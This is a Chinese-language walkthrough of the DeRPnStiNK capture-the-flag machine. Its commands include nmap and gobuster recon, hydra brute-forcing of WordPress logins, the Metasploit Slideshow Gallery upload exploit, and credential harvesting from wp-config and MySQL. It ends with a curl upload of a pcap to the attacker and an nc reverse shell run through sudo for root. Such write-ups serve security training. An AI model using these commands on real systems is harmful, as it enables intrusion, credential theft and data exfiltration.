端口
nmap主机发现
nmap -sn 192.168.159.120/24 Nmap scan report for 192.168.159.120 Host is up (0.00020s latency). 120是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.159.120 -p- --min-rate 10000 -oA nmap/scan 扫描开放端口保存到 nmap/scan下 PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http 发现开放3个端口
nmap -sT -sC -sV -O -p21,22,80 -oA nmap/scan 192.168.159.120详细端口扫描: -sT:完整tcp连接 -sC:默认脚本扫描 -sV:服务版本探测 -O:系统信息探测 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 1024 124ef86e7b6cc6d87cd82977d10beb72 (DSA) | 2048 72c51c5f817bdd1afb2e5967fea6912f (RSA) | 256 06770f4b960a3a2c3bf08c2b57b597bc (ECDSA) |_ 256 28e8ed7c607f196ce3247931caab5d2d (ED25519) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) |_http-server-header: Apache/2.4.7 (Ubuntu) |_http-title: DeRPnStiNK | http-robots.txt: 2 disallowed entries |_/php/ /temporary/ 分析: 21 ftp端口开放 80 web端口开放 22 ssh端口开放
21端口匿名登录不上去 看80端口,主页面只有两张图片,我们看源代码页面: 敏感信息1:<script type="text/info" src="/webnotes/info.txt"></script> 敏感信息2:注释<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->
立足
/webnotes/info.txt: <-- @stinky, make sure to update your hosts file with local dns so the new derpnstink blog can be reached before it goes live --> /webnotes: [stinky@DeRPnStiNK /var/www/html ]$ whois derpnstink.local Domain Name: derpnstink.local Registry Domain ID: 2125161577_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.fakehosting.com Registrar URL: http://www.fakehosting.com Updated Date: 2017-11-12T16:13:16Z Creation Date: 2017-11-12T16:13:16Z Registry Expiry Date: 2017-11-12T16:13:16Z Registrar: fakehosting, LLC Registrar IANA ID: 1337 Registrar Abuse Contact Email: stinky@derpnstink.local Registrar Abuse Contact Phone: Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ 综合以上信息: 我们需要给ip绑定一个host头derpnstink.local,以便于后续正常访问服务 vim /etc/hosts 192.168.159.120 derpnstink.local
目录扫描
gobuster dir -u http://derpnstink.local/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 发现: /weblog/ (Status: 200) [Size: 15172] 再扫一遍weblog目录, gobuster dir -u http://derpnstink.local/weblog -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash : /.html/ (Status: 403) [Size: 296] /.php/ (Status: 403) [Size: 295] /index.php/ (Status: 301) [Size: 0] [--> http://derpnstink.local/weblog/] /wp-content/ (Status: 200) [Size: 0] /wp-login.php/ (Status: 200) [Size: 2796] /wp-includes/ (Status: 403) [Size: 302] /wp-admin/ (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&reauth=1] /xmlrpc.php/ (Status: 405) [Size: 42] /.php/ (Status: 403) [Size: 295] /.html/ (Status: 403) [Size: 296] /wp-signup.php/ (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register] 显然是个博客,貌似还是wordpress,我的插件检测到了这就是wordpress,版本是4.6.29
wpscan扫描
wpscan扫描一下: wpscan --url http://derpnstink.local/weblog/ --api-token BQt8Nu27fqP76gJ44k9M5Z5AOuwQcc40k4YBs6lAUMY --disable-tls-checks 扫出了一个任意文件上传漏洞,其他的都是csrf或xss的跨站攻击 Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload 这个漏洞我试了半天,当尝试msf利用此漏洞时,才发现他是需要验证的文件上传漏洞(Authenticated Arbitrary File Upload),也就是我们需要一个用户才能利用此漏洞
hydra爆破用户和密码
我们使用hydra爆破wordpress有哪些用户: hydra -p 123 -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:Invalid" 解释一下:http-post-form表单数据是我提前用burp抓下来的,其中log=^USER^&pwd=^PASS^,分别是用户名密码及其占位符 Invalid表示回显中有“Invalid”字符串的结果不是我们想要的 抓到一个用户admin 我们使用hydra爆破admin的密码: hydra -P /usr/share/wordlists/SecLists-master/Passwords/darkweb2017-top10000.txt -l admin derpnstink.local http-post-form "/weblog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Fderpnstink.local%2Fweblog%2Fwp-admin%2F&testcookie=1:incorrect|empty" 成功爆破: [80][http-post-form] host: derpnstink.local login: admin password: admin
验证的文件上传漏洞利用(CVE-2014-5460)
https://nvd.nist.gov/vuln/detail/CVE-2014-5460 search slideshow 结果: 1 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload use 1 option这样设置: Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port] [...] RHOSTS derpnstink.local yes The target host(s), see https://github.com/rapid7/metas ploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /weblog yes The base path to the wordpress application VHOST no HTTP server virtual host WP_PASSWORD admin yes Valid password for the provided username WP_USER admin yes A valid username run 一下直接getshell : www-data
提权
信息枚举
还是之前配置错误信息收集,没什么敏感的,接下来尝试敏感文件收集 find /var/www -name *conf* 2>/dev/null /var/www/html/weblog/wp-config.php /var/www/html/weblog/wp-includes/images/smilies/icon_confused.gif /var/www/html/weblog/wp-content/plugins/akismet/views/config.php /var/www/html/weblog/wp-config-sample.php /var/www/html/weblog/wp-admin/setup-config.php cat /var/www/html/weblog/wp-config.php 获取到数据库登录用户密码 define('DB_NAME', 'wordpress'); define('DB_USER', 'root'); define('DB_PASSWORD', 'mysql'); mysql登录后一顿查,最后翻出来了: +------------------+-------------------------------------------+ | User | Password | +------------------+-------------------------------------------+ | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 | | unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB | | phpmyadmin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 | +------------------+-------------------------------------------+ unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ cat /etc/passwd:看到unclestinky对应的用户是stinky 破解$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41:wedgie57 su切换一下用户,成功了 cat flag.txt flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb) 我擦,flag2没找到直接到flag3了,算了等root后再说(虽然root后就懒得找了)
简单配置错误信息枚举后,没有可利用配置错误提权,直接收集下敏感信息
/home/stinky/Documents下有:
-rw-r--r-- 1 root root 4391468 Nov 13 2017 derpissues.pcap
pcap是抓的数据包
是root创建的,非常可疑,直接考下来wireshark分析
推荐一个很吊的脚本getfile.py,用于获取靶机上的文件 import http.server import os class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler): def do_POST(self): content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length) # 保存上传的文件 with open("uploaded_file", 'wb') as f: f.write(post_data) # 返回成功响应 self.send_response(200) self.end_headers() self.wfile.write(b'File uploaded successfully.') if __name__ == "__main__": PORT = 8000 server_address = ("", PORT) httpd = http.server.HTTPServer(server_address, SimpleHTTPRequestHandler) print(f"Serving on port {PORT}") httpd.serve_forever()
攻击机器:python getfile.py后 直接再靶机上:curl -X POST --data-binary @./derpissues.pcap http://192.168.159.47:8000/ 是不是非常方便,用不着scp那么麻烦,而且需要用户身份验证
简单分析获取mrderp用户密码
登录后,sudo -l看一下 Matching Defaults entries for mrderp on DeRPnStiNK: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User mrderp may run the following commands on DeRPnStiNK: (ALL) /home/mrderp/binaries/derpy* 直接:echo "mkfifo /tmp/f;nc 192.168.159.47 1234 0</tmp/f|/bin/sh > /tmp/f 2>&1;rm /tmp/f" > /home/mrderp/binaries/derpy.sh 然后: 攻击机器:nc -nvlp 1234 靶机:sudo /home/mrderp/binaries/derpy.sh
获取到root权限
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
补:flag2
flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) 使用unclestinky用户登录wordpress后台管理页面,在Dashboard中看到 之前查数据库时候 +------------------+-------------------------------------------+ | User | Password | +------------------+-------------------------------------------+ | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | root | *E74858DB86EBA20BC33D0AECAE8A8108C56B17FA | | debian-sys-maint | *B95758C76129F85E0D68CF79F38B66F156804E93 | | unclestinky | *9B776AFB479B31E8047026F1185E952DD1E530CB | <===========用来登录 wordpress | phpmyadmin | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 | +------------------+-------------------------------------------+ unclestinky $P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 <======= 用来登录ssh admin $P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/